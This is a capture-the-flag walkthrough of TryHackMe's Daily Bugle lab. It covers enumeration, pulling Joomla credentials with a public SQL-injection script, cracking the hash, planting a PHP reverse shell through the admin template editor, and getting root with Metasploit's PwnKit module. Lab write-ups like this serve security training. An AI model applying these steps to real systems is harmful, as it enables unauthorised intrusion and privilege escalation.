Today we will solve Daily Bugle from TryHackMe
first lets start with some enumeration.
sudo nmap -sC -sV -oA nmap/bugle
We found:
- ssh on 22
- http running apache on 80
- MySQL running MariaDB on 3306
nmap revealed robots.txt contains interesting paths
now lets check the website , going to
Good one :) jonah truly hates spiderman (answer to question 1)
ok lets check robots.txt
now we know it’s a Joomla Website, going to /administrator/
lets run joomscan since neither the website or the panel revealing the
version number.
joomscan -u
Now we know the version number, unfortunately we didn’t find any core
vuls with joomscan
search for public exploits on google we found a python script on github
called JoomBlah. lets download it and run it
we got the username and the password for jonah
its a bcrypt(md5) hash, you can use either johnTheRipper or Hashcat to crack it i will use hashcat and rockyou.txt.
hashcat.exe -m 3200 {filewithhashes} {wordlist}
Password: spiderman123
After that i tried to ssh to the machine but it didn’t work
ok, lets continue with the website lets go the panel and sign in with creds (jonah:spiderman123)
our goal now is to get a reverse shell, go Templates
go to any php file, use PHP shell from pentestmonkey
after getting a shell you may want to upgrade it
python -c ‘import pty;pty.spawn(“/bin/bash”)’
stty raw -echo ; fg
Enter + Enter
export TERM=xterm
unfortunately i couldn’t upgrade my shell due to some weird stuff with ZSH
So i created payload with msfvenom and upload it the machine
Then i created a handler
Ok now after we got a proper shell lets dive through the box
couldn’t get user.txt file with apache privileges so i decided to start to privesc directly.
This is not the intended way to solve it.
i abused CVE_2021_4034 which probably published after the machine was published and the authtor forgets to patched
so, the intended way was was to find configuration.php in the website folder
using these creds to login then priv esc using ‘yum’. :(
sorry for the inconvenience.
We already in meterpreter session lets run linux_suggester
run post/multi/recon/local_exploit_suggester
Now backgourd the current session by using backgroud
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set lhost tun0
set lport 1337
set WRITABLE_DIR /dev/shm
Now wait for the session
Now we are root you can read both user.txt and root.txt